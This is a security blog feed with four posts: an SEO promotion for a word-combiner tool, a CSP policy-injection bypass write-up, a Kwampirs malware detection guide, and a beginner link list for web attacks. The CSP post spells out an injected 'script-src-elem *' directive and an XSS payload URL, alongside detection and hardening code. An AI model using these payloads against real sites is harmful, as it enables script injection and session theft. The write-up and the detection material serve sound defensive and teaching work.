.:: Dark Site ::. (Blogger feed by Chandrakant, feed updated 2024-03-13)

Word Combiner Can Create Hundreds of Domain Names in Seconds (published 2019-10-24, updated 2019-10-25)<div dir="ltr" style="text-align: left;" trbidi="on">
<h1>
<span style="font-family: "times new roman" , serif; font-size: 12pt; font-weight: normal;">The biggest advantage users get from the word combiner made by Prepost Seo is the elimination of the mistakes people normally make. Creating words by combining them manually is a daunting task. If you are not using a tool, you will waste valuable time and energy combining words, because it is a very long process.</span></h1>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-WZKOrU8LyS0/XbGHJTr_FAI/AAAAAAAAXr4/KqEwJwAc7gM6lyDyiimifjv1hFh34TVugCLcBGAsYHQ/s1600/word.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="640" data-original-width="1024" height="250" src="https://1.bp.blogspot.com/-WZKOrU8LyS0/XbGHJTr_FAI/AAAAAAAAXr4/KqEwJwAc7gM6lyDyiimifjv1hFh34TVugCLcBGAsYHQ/s400/word.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "times new roman" , serif; font-size: 12pt;"><br /></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 7.5pt;">
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;">Done by hand, you need to write out every possible combination that you think could be appropriate. If you use our tool, all those combinations are generated for you and none are missed; if you do this on your own, there is a chance of making mistakes. We will also explain the benefits of using the </span><span style="font-family: "times new roman" , serif; mso-fareast-font-family: "Times New Roman";"><a href="https://www.prepostseo.com/word-combiner">Prepostseo</a></span><span style="font-family: "times new roman" , serif; font-size: 12.0pt;"><a href="https://www.prepostseo.com/p/factors-affecting-websites-to-rank-in-2019"> </a>word combiner tool. Keep on reading!</span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 7.5pt;">
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;">In this article, we will also explain how a word combiner is used to create domain names. For your website, you need one particular domain; that is logical. So why would you need multiple domain names? It is a fair question. These days, many people invest in domain names. They purchase domain names through </span><a href="https://godaddy.com/"><i style="mso-bidi-font-style: normal;"><span style="font-family: "times new roman" , serif; mso-fareast-font-family: "Times New Roman";">Go Daddy</span></i></a><i style="mso-bidi-font-style: normal;"><span style="font-family: "times new roman" , serif; font-size: 12.0pt;">.</span></i><span style="font-family: "times new roman" , serif; font-size: 12.0pt;"> If someone wants to buy them in the future, the owner can sell them at a higher price.</span></div>
<h2>
<b style="mso-bidi-font-weight: normal;"><span style="font-family: "times new roman" , serif; font-size: 12.0pt; line-height: 107%;">
Make no mistakes<o:p></o:p></span></b></h2>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 7.5pt;">
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;">We all have imperfections. The most common human error is skipping things by mistake. Some firms are trying to invest heavily in domain names. If they give a person the job of combining and merging words manually, the employee will surely miss many domain names, and the company will not be able to invest in them.</span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 7.5pt;">
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;">If the company misses any of the domain names, the firm naturally misses a big investment opportunity. Everyone knows how beneficial it is these days to invest in domain names. The word combiner tool created by Prepost Seo lets you create a great many word combinations, which can help to create any number of domain names. Firms can invest in all of them. In a few years’ time, the companies themselves will see their investment give them millions of dollars in return, because of the boom in the digital marketing industry. It is expected that more and more people will move towards </span><span style="font-family: "times new roman" , serif;"><a href="https://www.prepostseo.com/p/mindblowing-statistics-for-a-better-digital-marketing-strategy">digital marketing</a></span><span style="font-family: "times new roman" , serif; font-size: 12.0pt;"> by 2020.</span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 7.5pt;">
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;">Furthermore, firms do not create domain names only for the sake of investment. Sometimes conglomerates want to launch multiple brand names, and for them creating different websites works. For instance, in order to capture the market, a conglomerate can create multiple websites with the same kind of product range. Consequently, customers will not go anywhere else. Obviously, more domains are helpful for this.</span></div>
<h2>
<b style="mso-bidi-font-weight: normal;"><span style="font-family: "times new roman" , serif; font-size: 12.0pt; line-height: 107%;">Simple use of word merge tool<br style="mso-special-character: line-break;" />
<!--[endif]--><o:p></o:p></span></b></h2>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 7.5pt;">
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;">You do not need a postgraduate degree in information technology. Similarly, you do not need certifications in Oracle, Python, etc. The word combiner tool can be used smoothly and easily. All you need to do is open the website. Even if you have no basic computer knowledge, it does not matter. You just need to type, and you can see the most probable combinations. Make sure to type each word on a separate line.<br style="mso-special-character: line-break;" />
<!--[endif]--><o:p></o:p></span></div>
<h2>
<b style="mso-bidi-font-weight: normal;"><span style="font-family: "times new roman" , serif; font-size: 12.0pt; line-height: 107%;">What is the usage of Word Combiner?</span></b></h2>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 7.5pt;">
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;">With the assistance of this tool, you can create content of better quality, and as a result the website can get a better ranking on search engine results pages. If your website is ranked on the first page of Google and is at the top position, it will generate more traffic; more people will visit it. Ask yourself this question: will you go to the second or third page of Google to search for anything? The answer is <i style="mso-bidi-font-style: normal;">‘No’</i>. People want to make things easy for themselves, which is why they prefer visiting websites on the first page. The only way to achieve this is by using specific keywords. So, a search engine optimizer has to use word combinations carefully and skillfully. When a website is ranked in a higher slot, more people are convinced to click on it. <br style="mso-special-character: line-break;" />
<!--[endif]--><o:p></o:p></span></div>
<h3>
<b style="mso-bidi-font-weight: normal;"><span style="color: windowtext; font-family: "times new roman" , serif; mso-fareast-font-family: "Times New Roman";">Creation of
appropriate backlinks<o:p></o:p></span></b></h3>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 7.5pt;">
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;">If appropriate backlinks are created, they naturally improve a website's prospects quickly; it is not something that takes ages. Backlinking involves placing hyperlinks in your content that link to a particular website. Backlinks can be established with the help of a guest post. Those guest posts must have the best content quality with the appropriate keywords. It is good to include more and more keyword combinations in order to match the major searches by users.<br /></span></div>
<h2>
<b style="mso-bidi-font-weight: normal;"><span style="font-family: "times new roman" , serif; font-size: 12.0pt; line-height: 107%;">Different stages involved in the process</span></b><b style="mso-bidi-font-weight: normal;"><span style="font-family: "times new roman" , serif; font-size: 12.0pt; line-height: 107%;"><o:p> </o:p></span></b></h2>
<div class="MsoNormal">
<span style="font-family: "times new roman" , serif; font-size: 12.0pt; line-height: 107%;">Prepost Seo has built a very easy-to-use tool. The tool delivers the result in a matter of seconds. All the existing possibilities will be presented to you. Whether you are a search engine optimizer or just a layman, you can see the possible combinations.</span><span style="font-family: "times new roman" , serif; font-size: 12.0pt; line-height: 107%;"> Please follow the steps explained below:<br style="mso-special-character: line-break;" />
<!--[endif]--><o:p></o:p></span></div>
<h3 style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="color: windowtext; font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><b style="mso-bidi-font-weight: normal;"><span style="color: windowtext; font-family: "times new roman" , serif; mso-fareast-font-family: "Times New Roman";">Pick a reliable word combiner tool<br style="mso-special-character: line-break;" />
<!--[endif]--><o:p></o:p></span></b></h3>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 7.5pt;">
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;">We suggest you make this decision carefully and not rush. The combining tools available on the internet only produce inefficient and insufficient results. There would be nothing different in their results. Try to select the proper kind of tool.<br style="mso-special-character: line-break;" />
<!--[endif]--><o:p></o:p></span></div>
<h3 style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="color: windowtext; font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><b style="mso-bidi-font-weight: normal;"><span style="color: windowtext; font-family: "times new roman" , serif; mso-fareast-font-family: "Times New Roman";">Picking the right keywords</span></b></h3>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 7.5pt;">
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;">
The tool will only work when you have used the right kind of keywords. If keywords are missed, the tool will not work properly, and inappropriate combinations will appear as a result. <br style="mso-special-character: line-break;" />
<!--[endif]--><o:p></o:p></span></div>
<h3 style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="color: windowtext; font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><b style="mso-bidi-font-weight: normal;"><span style="color: windowtext; font-family: "times new roman" , serif; mso-fareast-font-family: "Times New Roman";">Combine the keywords</span></b></h3>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 7.5pt;">
<span style="font-family: "times new roman" , serif; font-size: 12.0pt;">
This is the final part, and if you are serious you should know that this part can even decide the future of your website. Do not take risks or chances. Please make sure that no keywords have been missed. We suggest you use the maximum number of possible combinations that appear when you click on the word <i style="mso-bidi-font-style: normal;">‘Combine’</i>. It will bring more customers to your website. Write all the words separately and properly in the text box on the website. Finally, click on the word <i style="mso-bidi-font-style: normal;">‘Combine’.</i></span></div>
<div class="MsoNormal">
<span style="background-color: white; border: 1pt none; font-family: "georgia" , serif; font-size: 14.6667px; padding: 0cm; text-align: justify;">Author Bio: Asad Shehzad writes SEO articles for online business marketers and SEO tools users to make their Google rankings surge. His articles have appeared in a number of websites i.e., <i><u>eLearning Industry</u></i>, <i><u>Calculators.tech</u></i> and <i><u>Inside Tech Box</u></i>. He contributes articles about digital marketing, SEO techniques, and tech regularly to </span><b style="background-color: white; color: #222222; font-family: Calibri, sans-serif; font-size: 14.6667px; text-align: justify;"><i><u>Prepostseo.com</u></i></b></div>
</div>
Posted by Chandrakant

How to perform CSP Bypass | techniques. (published 2019-10-14, updated 2019-10-15)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="MsoNormal">
During one of my recent security tests, I came across a
very interesting scenario where a token was being passed in GET requests. Of course,
I could sense something interesting here. For protection, this application
had almost all the security headers that you will find in a modern web
application.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-JTAEDjQFL2Q/XaSqVSLaiVI/AAAAAAAAXiU/geHp1i0Gl7ErB6mkWZ1POKqUpp5p3C1bACLcBGAsYHQ/s1600/content-security-policy.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="630" data-original-width="1200" height="336" src="https://1.bp.blogspot.com/-JTAEDjQFL2Q/XaSqVSLaiVI/AAAAAAAAXiU/geHp1i0Gl7ErB6mkWZ1POKqUpp5p3C1bACLcBGAsYHQ/s640/content-security-policy.jpg" width="640" /></a></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="MsoNormal">
One of the headers that grabbed my attention was CSP.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
https://www.xyz.com/upload/content/info/data/csp?<span style="box-sizing: border-box;">parameter=<span style="color: red;"><b>tokens</b></span></span></div>
<div class="MsoNormal">
<span style="box-sizing: border-box;"><br /></span></div>
<div class="MsoNormal">
For those who don’t know what CSP is, you can go through these good
links.</div>
<div class="MsoNormal">
<a href="https://www.netsparker.com/blog/web-security/content-security-policy/">CSP Netsparker Read</a> </div>
<a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP">Mozilla CSP Read</a><br />
In simple words, CSP is used to prevent attacks like XSS, mixed-content
security issues, or anything that leads to code injection into trusted
resources.<br />
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
On my target, I noticed headers like this:</div>
<div style="background: whitesmoke; border: solid #CCCCCC 1.0pt; margin-left: 15.0pt; margin-right: 15.0pt; mso-border-alt: solid #CCCCCC .75pt; mso-element: para-border-div; padding: 7.0pt 7.0pt 7.0pt 7.0pt;">
<div class="MsoNormal" style="background: whitesmoke; border: none; line-height: normal; margin-bottom: 22.5pt; mso-border-alt: solid #CCCCCC .75pt; mso-padding-alt: 7.0pt 7.0pt 7.0pt 7.0pt; padding: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt; word-break: break-all;">
<span style="background: white; color: #333332; font-family: "courier";">Content-Security-Policy: default-src
'self' https://*.xyz.com https://www.xyz.com 'unsafe-inline';img-src https:
data:;object-src 'none'; report-uri /upload/content/info/data/csp?</span><span class="red"><b><span style="box-sizing: border-box;"><span style="color: #990000;">parameter=tokens</span></span></b></span><span style="color: #333333; font-family: "consolas"; font-size: 11.5pt;"></span></div>
</div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">On xyz.com, we can see that it was taking the token from the GET
request and embedding it in the response headers, in the report-uri directive of its CSP. So anything we inject
there ends up in the CSP.</span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;"><br /></span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">There is a nice write-up where I read about a <a href="https://portswigger.net/research/bypassing-csp-with-policy-injection">similar case</a>, so I thought of trying something similar. I
used the semicolon and dash symbols to
inject into the CSP.</span></div>
<div style="background: whitesmoke; border: solid #CCCCCC 1.0pt; margin-left: 15.0pt; margin-right: 15.0pt; mso-border-alt: solid #CCCCCC .75pt; mso-element: para-border-div; padding: 7.0pt 7.0pt 7.0pt 7.0pt;">
<div class="MsoNormal" style="background: whitesmoke; border: none; line-height: normal; margin-bottom: 22.5pt; mso-border-alt: solid #CCCCCC .75pt; mso-padding-alt: 7.0pt 7.0pt 7.0pt 7.0pt; padding: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt; word-break: break-all;">
Content-Security-Policy:
default-src 'self' https://*.xyz.com https://www.xyz.com 'unsafe-inline';img-src
https: data:;object-src 'none'; report-uri /upload/content/info/data/csp?<span style="box-sizing: border-box;">parameter=<span style="color: #990000;"><b>tokens;-abc</b></span></span></div>
</div>
<div style="background: white;">
<br /></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">Now that it's working, let's create a POC. Chrome by
default ignores invalid directives, and our injection point is
embedded at the end of the policy, so let's override the directives. </span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">Well, many directives needed a trial-and-error
approach, such as:</span></div>
<pre style="background: white; margin-bottom: 12.0pt; margin-left: 0in; margin-right: 0in; margin-top: 12.0pt;"><span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">directive-name<span style="mso-spacerun: yes;"> </span>= "script-src-elem"</span></pre>
<pre style="background: white; margin-bottom: 12.0pt; margin-left: 0in; margin-right: 0in; margin-top: 12.0pt;"><span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">directive-name<span style="mso-spacerun: yes;"> </span>= "img-src"</span></pre>
<pre style="background: white; margin-bottom: 12.0pt; margin-left: 0in; margin-right: 0in; margin-top: 12.0pt;"><span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">directive-name<span style="mso-spacerun: yes;"> </span>= "object-src"</span></pre>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">and many more; check here: </span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;"><span style="color: windowtext; text-decoration: none; text-underline: none;"><a href="https://w3c.github.io/webappsec-csp/#csp-directives">CSP Directives</a></span></span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;"><br /></span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">You can use any directive that works for you. I used one of
them, script-src-elem.</span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">The </span><i>script-src-elem</i> directive
applies to all script requests and script blocks. Attributes that execute
script (inline event handlers) are controlled via script-src-attr. So the policy we want for the attack would be:</div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;"><br /></span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">Content-Security-Policy: script-src-elem
'none'; script-src-attr 'unsafe-inline'</span></div>
<div style="-webkit-text-stroke-width: 0px; background: white; box-sizing: border-box; font-variant-caps: normal; font-variant-ligatures: normal; margin: calc(0.5 * var(--spacingbase)) 0; orphans: 2; text-align: start; text-decoration-color: initial; text-decoration-style: initial; widows: 2; word-spacing: 0px;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">&lt;script&gt;alert("Will be Blocked")&lt;/script&gt;<br />
&lt;img src=X onerror="alert('Can run happily')"&gt;</span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;"><br /></span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">This directive overrides the existing script-src (as
most directives behave), so you can bypass CSP easily.</span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">The interesting thing about this directive is
that it will override existing script-src directives! So you can use it to
bypass CSP, provided you have policy injection.</span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">So the payload will be </span></div>
<div style="background: white;">
<span style="color: red; font-family: "calibri" , sans-serif; font-size: 11.0pt;"><br /></span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;"><b><span style="color: red;"><span style="font-size: 12pt; text-decoration: none;"><a href="https://www.xyz.com/upload/content/info/data/csp?token=%3b%2dscript-src-elem+*&param=%3cimg+src=%22uploadedserver/xsspayload.js%22%3e%3c/img">https://www.xyz.com/upload/content/info/data/csp?parameter=%3b%2dscript-src-elem+*&param=<img+src="XSS payload"></img</a></span>></span></b><span style="color: red;"></span></span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;"><br /></span></div>
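<div style="background: white;">
The root cause described above is a request parameter copied unencoded into the report-uri value. As an added example (not code from the original post or from the tested application), the Python below rebuilds the post's header the way the server is assumed to, parses it the way a browser does, and shows the percent-encoding fix; the function names are hypothetical and the parameter values are constructed.</div>

```python
"""Added example: report-uri policy injection and an encoding fix."""
from urllib.parse import quote

# Policy prefix taken from the header shown in the post; the request
# parameter is appended to the report-uri value.
BASE_POLICY = (
    "default-src 'self' https://*.xyz.com https://www.xyz.com 'unsafe-inline';"
    "img-src https: data:;object-src 'none'; "
    "report-uri /upload/content/info/data/csp?parameter="
)
EXPECTED_DIRECTIVES = {"default-src", "img-src", "object-src", "report-uri"}
# Fetch-directive fallback chain for <script> elements (CSP Level 3).
SCRIPT_ELEM_FALLBACK = ("script-src-elem", "script-src", "default-src")


def build_csp_vulnerable(param):
    """Assumed server behaviour: the raw parameter is concatenated."""
    return BASE_POLICY + param


def build_csp_hardened(param):
    """Percent-encode the value so ';', ',' and spaces stay inside the URL."""
    return BASE_POLICY + quote(param, safe="")


def parse_csp(header_value):
    """Split one serialized policy into {directive-name: [values]}.

    Follows the browser rules that matter here: ';' separates directives,
    names are case-insensitive, and a repeated name is ignored.
    """
    directives = {}
    for chunk in header_value.split(";"):
        tokens = chunk.split()
        if not tokens:
            continue
        name = tokens[0].lower()
        if name not in directives:
            directives[name] = tokens[1:]
    return directives


def unexpected_directives(header_value):
    """Directive names the application never meant to send."""
    return sorted(set(parse_csp(header_value)) - EXPECTED_DIRECTIVES)


def script_elem_governor(header_value):
    """Return (name, values) of the directive that governs <script> elements."""
    directives = parse_csp(header_value)
    for name in SCRIPT_ELEM_FALLBACK:
        if name in directives:
            return name, directives[name]
    return None, []


if __name__ == "__main__":
    # Constructed inputs: a normal token, the post's ";-abc" probe, and a
    # value that appends a script-src-elem directive.
    for value in ("tokens", "tokens;-abc", "tokens;script-src-elem *"):
        for build in (build_csp_vulnerable, build_csp_hardened):
            header = build(value)
            print(build.__name__, repr(value),
                  unexpected_directives(header), script_elem_governor(header)[0])
```

Not reflecting request data into the header at all removes the problem class; the encoding shown is for cases where the value has to be kept.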
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">So just implementing a security control doesn’t always
make your product secure. Of course, it adds a layer of defense, but not 100%.
Hope you liked it.</span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;"><br /></span></div>
<div style="background: white;">
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt;">Thanks for reading, have a nice time ahead.</span></div>
<div class="MsoNormal">
<br /></div>
<br /></div>
Posted by Chandrakant

Health Care Malware Kwampirs in Details (published 2019-05-15, updated 2019-10-14)<div dir="ltr" style="text-align: left;" trbidi="on">
This post is about the Kwampirs malware, which mainly targets the health care sector. In this post I will share my recent experience identifying this malware, as well as tips to keep your systems free of it.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-HHkhziB75cs/XNvpDGRFrNI/AAAAAAAAUfU/QvgAJVDdE28cYEQShnfy2fsmFf8KMkj4wCLcBGAs/s1600/kwampirs.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="510" data-original-width="1181" height="276" src="https://4.bp.blogspot.com/-HHkhziB75cs/XNvpDGRFrNI/AAAAAAAAUfU/QvgAJVDdE28cYEQShnfy2fsmFf8KMkj4wCLcBGAs/s640/kwampirs.jpg" width="640" /></a></div>
<h2>
About Kwampirs:</h2>
<br />
Kwampirs is basically a backdoor trojan used by hackers to gain remote access to compromised computers. When executed, the Trojan decrypts and extracts a copy of its main DLL payload. Kwampirs targets the WMI Performance Adapter service present in Windows, and upon infection it sets the service up as WMI Performance Adapter Extension (WmiApSrvEx) with autostart type. It only targets Windows systems that don't have any sort of security prevention mechanism, such as the latest antivirus. It has nothing to do with Linux/Mac environments.<br />
<br />
<h2>
How to check for kwampirs infection?</h2>
On your system, open Run (Win+R) and type services.msc.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-yaoJKluEd2c/XNvmey8tQ0I/AAAAAAAAUfA/LUXWsv8ohf8jZBxDlko5Gg_YBdANCkGUwCLcBGAs/s1600/service.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="259" data-original-width="404" height="205" src="https://2.bp.blogspot.com/-yaoJKluEd2c/XNvmey8tQ0I/AAAAAAAAUfA/LUXWsv8ohf8jZBxDlko5Gg_YBdANCkGUwCLcBGAs/s320/service.jpg" width="320" /></a></div>
<br />
Check for the service WmiApSrvEx (<b>WMI Performance Adapter Extension</b>). If it is present, in either a running or stopped state, the system is infected with Kwampirs.<br />
<br />
<a href="https://3.bp.blogspot.com/-t1aHEKBgO7o/XNvmi-wDjII/AAAAAAAAUfE/YSbWM9rfpkIqKbTbf29f_tt_UxQvPzsBACLcBGAs/s1600/infection.jpg" imageanchor="1"><img border="0" data-original-height="321" data-original-width="593" height="173" src="https://3.bp.blogspot.com/-t1aHEKBgO7o/XNvmi-wDjII/AAAAAAAAUfE/YSbWM9rfpkIqKbTbf29f_tt_UxQvPzsBACLcBGAs/s320/infection.jpg" width="320" /></a><br />
<br />
You can also check for the infection using the registry.<br />
<b><br />
Key Path:</b> <i>CurrentControlSet\Services\WmiApSrvEx\</i><br />
<b>Path:</b> <i>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmiApSrvEx</i><br />
<br />
You can also look in system folders such as c:\Windows\System32\ & C:\windows\SYSWOW64 for service executables (.exe) named:<br />
wmiapsrvce<br />
wmipsrvce<br />
wmiapsrvcep<br />
wmiapsvrce<br />
etc., or DLLs named:<br />
wmiamgmt<br />
wmiassn<br />
wmipadp<br />
<br />
Some .PNF files are also associated with the malware:<br />
C:\Windows\inf\mtmndkb32.pnf<br />
C:\Windows\inf\digirps.pnf<br />
etc.<br />
<br />
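The checks described above, collected into one script as an added example (not from the original post or any vendor tool): it tests for the WmiApSrvEx service key and scans System32, SysWOW64 and inf for the file names listed in this post. The function names are hypothetical, and the indicator lists are only the ones on this page.<br />

```python
"""Added example: look for the Kwampirs indicators listed in this post."""
import os
import sys
import tempfile
from pathlib import Path

# Indicators copied from the post; its lists end in "etc", so these are
# not exhaustive.
SERVICE_KEY = r"SYSTEM\CurrentControlSet\Services\WmiApSrvEx"
EXE_STEMS = {"wmiapsrvce", "wmipsrvce", "wmiapsrvcep", "wmiapsvrce"}
DLL_STEMS = {"wmiamgmt", "wmiassn", "wmipadp"}
PNF_NAMES = {"mtmndkb32.pnf", "digirps.pnf"}
SCANNED_FOLDERS = ("system32", "syswow64", "inf")


def _is_indicator(folder_name, file_name):
    """Case-insensitive match of one file name against the post's lists."""
    folder, name = folder_name.lower(), file_name.lower()
    stem, _, ext = name.rpartition(".")
    if folder in ("system32", "syswow64"):
        return (ext == "exe" and stem in EXE_STEMS) or \
               (ext == "dll" and stem in DLL_STEMS)
    return folder == "inf" and name in PNF_NAMES


def scan_windows_dir(windows_dir):
    """Return sorted 'folder/file' hits under the given Windows directory."""
    hits = []
    for folder in Path(windows_dir).iterdir():
        if folder.name.lower() not in SCANNED_FOLDERS or not folder.is_dir():
            continue
        for entry in folder.iterdir():
            if _is_indicator(folder.name, entry.name):
                hits.append(f"{folder.name}/{entry.name}")
    return sorted(hits)


def service_key_present():
    """True/False on Windows; None elsewhere (no registry to query)."""
    if sys.platform != "win32":
        return None
    import winreg
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, SERVICE_KEY):
            return True
    except FileNotFoundError:
        return False


def demo_constructed_tree():
    """Scan a throwaway tree of empty files with constructed names."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel in ("System32/wmiapsrvce.exe", "System32/notepad.exe",
                    "SysWOW64/WMIASSN.DLL", "inf/digirps.pnf", "inf/oem1.pnf"):
            path = root / rel
            path.parent.mkdir(parents=True, exist_ok=True)
            path.write_bytes(b"")
        return scan_windows_dir(root)


if __name__ == "__main__":
    if sys.platform == "win32":
        # Use 64-bit Python on 64-bit Windows: a 32-bit process sees the
        # SysWOW64 content under System32 (file system redirection).
        print("service key present:", service_key_present())
        print("file hits:",
              scan_windows_dir(os.environ.get("SystemRoot", r"C:\Windows")))
    else:
        print("constructed tree hits:", demo_constructed_tree())
```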
<h2>
Target Systems:</h2>
A system with no antivirus protection.<br />
Older XP or Server 2000/2008 systems that are not managed properly.<br />
<br />
<h2>
Steps to Make Your Network Kwampirs Infection Free:</h2>
Make sure all systems have the latest antivirus protection.<br />
If a certain group of systems, such as XP, can't have antivirus protection, make sure they are operated in an isolated network.<br />
<br />
Hope this post helps you to know the details about Kwampirs.<br />
<br />
Please do share your views on this; if you have any query, I will definitely try my level best to answer.</div>
Posted by Chandrakant

Learning Security Testing : For Beginners (published 2016-03-30, updated 2016-04-07)

Hi friends, it's been a long time since I posted anything, so here is something that will help you for sure. There are many people out there, including students, who often ask me, "I want to learn this security stuff; where should I start?"<br />
<br />
Again, let me clearly tell you that this website contains many links; pick any one that will be helpful to you. Now I am putting together some structured URLs from which you can easily learn many things. Remember, these are all for technical purposes only :).<br />
<a href="https://1.bp.blogspot.com/-VyKn_TZ5p18/Vvt5qQfvU1I/AAAAAAAAHP8/Cccy3mxFEWcTEAkioypBco7EY1-o5P7eg/s1600/Beginner.jpg" imageanchor="1" ><img border="0" src="https://1.bp.blogspot.com/-VyKn_TZ5p18/Vvt5qQfvU1I/AAAAAAAAHP8/Cccy3mxFEWcTEAkioypBco7EY1-o5P7eg/s320/Beginner.jpg" /></a><br />
So here we go with the web application security part.<br />
Learn the fundamental/primary attacks.<br />
<br />
<b>-XSS(cross site scripting )</b><br />
<br />
<li>Beginners tutorial on XSS :<a href="http://excess-xss.com/">See this link</a><br />
<li>Google XSS learning Tutorials: <a href="https://www.google.com/about/appsecurity/learning/xss/">See this link</a><br />
<li>Advance attacks bypass XSS Filters/IDS:<a href="https://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-FavoriteXSS-SLIDES.pdf">See this book</a><br />
<br />
<b>-CSRF(Cross Site request Forgery)</b><br />
<br />
Many beginners find this slightly difficult to understand, so the links below give a simple explanation.<br />
<li>How to find and prevent CSRF <a href="http://blackhat.com/presentations/bh-usa-06/BH-US-06-Gallagher.pdf">Download this book</a><br />
<li>exploiting/attacking with CSRF Vulnerability <a href="http://tipstrickshack.blogspot.com/2012/10/how-to-exploit-csfr-vulnerabilitycsrf.html">See this link</a><br />
<br />
<br />
<b>-SQL Injection</b><br />
<br />
<li>Introduction to SQL Injection error based sqli: <a href="https://prakharprasad.com/introduction-to-sql-injection-and-exploitation-mysql-5-error-based/">See this link</a> <br />
<li>MSSQL Injection Complete Tutorial- <a href="https://www.exploit-db.com/papers/12975/">See this link</a><br />
<li>Everything you wanted to know about SQL injection - <a href="http://www.troyhunt.com/2013/07/everything-you-wanted-to-know-about-sql.html">See this link</a><br />
<br />
<br />
<b>Remote Code/Command Execution</b><br />
<br />
<li>How to find RCE in scripts (with examples)- <a href="https://www.exploit-db.com/papers/12885/">See this link</a><br />
